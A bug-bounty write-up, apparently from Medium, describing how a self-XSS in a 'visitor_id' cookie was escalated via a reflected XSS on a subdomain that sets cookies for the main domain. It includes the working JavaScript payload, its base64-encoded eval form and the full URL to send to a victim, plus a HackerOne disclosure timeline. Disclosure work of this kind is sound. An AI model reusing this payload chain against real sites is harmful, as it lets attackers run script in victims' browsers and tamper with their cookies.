From Unexploited XSS To Self Stored XSS on victim Cookies

Day#1

This is part 2 of this story , i will talk about a self XSS on Cookies And how i did the exploit through an out of scope subdomain.

So our target is redact.com. firstly how i got the vulnerable attribute on cookies based? After browsing the redact.com i stopped in this path www.redacted.com/redactedfolder/redactedpage/ID and i used param miner {bruteForce] for hidden parameters , i got TWO but Unfortunately all are Filtered, then turned to guess Cookie parameters

finally i got an attribute named visitor_id and was injected on the js source code

Now i have A self XSS and it’s out of scope. but subdomains allows you to set cookie so i will exploit through an out-of scope subdomain.

Day#2

i extracted subdomains, after 1h/2h i got an reflected xss on a sub named http://dev-labs.redact.com/login?username=[Here], So we will set cookie from subdomain to the main domain, [Hope you understand the exploitation if you not , please watch the video]

our exploit:

document.cookie='visitor_id=w0</script><svg/onload=alert(document.domain)>; domain=.redact.com; path=/;' ;document.location="https://www.redact.com/redactfolder/redactpage/1337"

let’s Encode it:

</script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>

So Now we have A valid Poc will all sent the url to victime:

http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>

will automatically redirect us with the visitor_id attribute and payload to main domain because we have add it via document.location. it’s Work :D

{ Reported Via Hackerone on Jan 2nd

Hackerone Staff updated the severity from High to Medium(6.1) on Jan 4th

Programe Staff Triaged Report on Jan 7th

Bounty Paid on Jan 7th

Resolved on Jan 10th }

That’s all, thankyou very much for reading it till the last. Hope you would have enjoyed it.

my instagram

https://www.instagram.com/yassinek3ch/

Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store